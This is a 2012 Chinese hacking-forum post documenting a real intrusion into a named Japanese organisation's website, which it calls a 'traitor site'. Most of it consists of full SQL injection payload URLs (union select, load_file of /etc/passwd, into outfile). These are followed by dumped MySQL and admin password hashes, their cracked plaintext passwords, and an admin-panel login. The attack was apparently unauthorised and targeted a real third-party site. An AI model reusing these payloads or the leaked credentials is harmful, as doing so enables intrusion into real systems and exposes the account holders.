中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
. L1 n! e- ~& \# [% Y
: ~5 `6 u a! ^6 R# p2 R
0x01. 检测
www.zuaa.jp
收集数据
3 J5 A L$ v1 R/ k# T
[attach]73[/attach]
7 c" T6 z( M, m2 J7 p
5 ~+ W# e) m9 L, [' I
whatweb
- V5 r* [' B) ]7 N3 n2 t/ a- E
[attach]74[/attach]
. K& r/ n* h! W8 g# z
! Y3 m9 ]5 R" {# ^9 s6 I' n
利用NMAP扫描
/ E: Q2 A/ y, A, Q, P8 \; T6 X
[attach]75[/attach]
( b; j7 k8 O. v$ ?" \( C
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; T0 i0 {; i/ h* k
0x02.找注入点
, k4 i: [9 x; K/ O( O
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
3 d3 h8 w2 p x; Y
[attach]76[/attach]
8 {6 e3 K% e' A# }( y2 f2 R$ R: e- I
. N+ n5 _ {4 i, k
0x03.order by
( t4 d- ~' n/ z
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
$ K) v4 T' W! }. X3 H$ _% P
[attach]77[/attach]
5 A& |# d; E! Z: f4 r
order by 28报错,order by 27正常
3 o' M V m- N$ r5 z
! ^! o3 k0 m& Y( D4 B8 Q
0x04. union手动查询
% K8 ~: t) W: g* l% h/ c8 d
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: R# K! o- K; o! T3 S
添加到 27 时正常显示
. J( p. v0 n5 R: X% e
[attach]78[/attach]
: [ y5 E1 |0 ~% c/ K
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; v2 `. t7 v- J! C/ A$ ~
/ R @' N" b" p, P* _, K' I/ |
0x05. info:
W5 @+ z: a9 b: A$ _% }+ w# M
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 J, A% d3 h+ B$ m( P
[attach]79[/attach]
+ b7 H3 i8 s9 H& G4 Z, J
user: root@localhost
/ r. s+ n& [9 G
database: openpne
+ L" v9 H" Z, G3 Y, g5 ~. p
version: 4.1.22
, l" |& N& I: H; Y: c1 A
os: portbld-freebsd5.4
1 k/ O' C+ d9 c {, ]8 `
. @- I' | {' h0 t- E% t# }
0x06. root用户
; F1 F1 m) N1 c
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
/ A3 c& ^7 z9 H3 b
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( T8 `+ R- F, P9 w! c
[attach]80[/attach]
3 A! H- Z. W( N8 k( I6 _- Y& e
通过工具转换
( A8 l) V& B9 k
[attach]81[/attach]
/ I0 S; d* W4 k& K. X' i9 g
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
5 W1 ]( d" H* g
. o$ U' p6 k) j4 G9 j. D" _! D
0x07. 利用 into outfile
. a6 A) Z8 F* l
全部都失败
' E4 L# n# a. e4 v: o" l
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
% J9 J& b0 c% Z
5 s$ R- V* H. O; V# v/ @
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
. n. T; Q3 W) Z) w( x# l
; h4 B) Z2 @2 F
页面显示“MDB2 Error:syntax error”
5 V4 f5 y3 K( o- u4 |& K# V' N
( G1 Q$ p; Y, {# K
0x08. 利用 mysql 4.1
* _$ @; S# @6 _; W
猜常规表名,字段未果 工具 sqlmap
, Y: K! W' N! B$ Z3 M* ?& [8 g
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
3 u6 e- k# h2 z1 _
/ K2 p+ ]# l! e; O7 k- T5 k
[attach]82[/attach]
3 \. z; E* ?7 I) y% a/ T
% e* e2 J: @" @! X6 M2 [9 Z4 s' X
0x09. 查找后台
* x) J0 h9 w/ B8 A6 S
利用 现有的各种 后台工具尝试都不行
$ \! H. q; p$ \( a' q% I
: F7 a& K! z, Q+ P) m4 N
0x10. MySL外联方法
) {$ j k4 _. d* ~/ q: Q- ?
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
) W6 P9 j- p/ M7 Q% X) X7 m
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
6 ~+ P- l# ~& t! o- q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
$ \1 ^+ _6 k: K' |9 S# x
[attach]83[/attach]
1 j: @- P- [& R
这个可以在
www.cmd5.com
解密
6 g* J% a2 y" h) Q7 }
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
- p, p+ W7 R* O6 S2 l% }
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
, V0 y) {( ~7 W* n5 V
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( R. X* ^6 F2 u/ e2 G
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
- ~2 |. U% s0 w& `3 x8 X, w4 M+ _
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
( c/ d: o5 S( I: v, m
[attach]84[/attach]
% J/ @; r0 H4 g C3 O3 I# p
; R2 ?& ?% ?# ~
0x11. 网站突破
0 q0 O" d; y$ c: a% B& `
发现网站的源程序 openpne, google 下载 openpne 源码
, @$ W2 w: F& j
[attach]85[/attach]
8 y' |/ A4 H/ W0 A
" J- a% c" F2 U0 u5 _5 i% ~% y
0x12. 默认信息利用
& U5 ]0 u: b8 a
http://sns.zuaa.jp/?m=admin&a=page_login
9 p X* @0 b" d W
[attach]86[/attach]
" Q6 ~1 J2 F" W) A; u# C8 D& ?, g
表名 (c_admin_user) ,字段名(username,password)
! l0 L2 e; n7 D% i9 ]
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 Y4 X2 l! r0 Q& a# g6 B
[attach]87[/attach]
/ `) ]1 h- B+ G0 Z) q- R1 m
解密
; ~( J8 ?( u0 E1 m4 S. d$ R
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
x8 C8 O* r! }
zuaajp:c0923ec5857796a393da99905008c176, zju1897
, U: u3 u$ x* m( K
- ~3 N" i4 o1 D& K6 v
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
5 ^' L5 j, e1 S. g
2 L3 L; y" r' C: B) H
0x13. 登录后台
. Y( e) S! ~5 j$ _. E
[attach]88[/attach]
5 F8 d7 C) Y! `) a6 T
1 e9 {, D2 Z3 D5 M! e, \
* [7 n* m& _( A9 y. Q! b v
0x14. 小结
4 j* a/ N# [' t" ^* I9 x
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# d6 [3 f: y, l# o4 @
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
/ f- q9 H" o7 Z1 Q& `
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
& v- Z. d8 W1 D( o" C5 }
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
* ^4 P7 L* }8 l6 q1 e, m8 y
* e& k& W% |% ~- q0 Q
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
; {8 B/ }& y7 F1 E- s) \
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2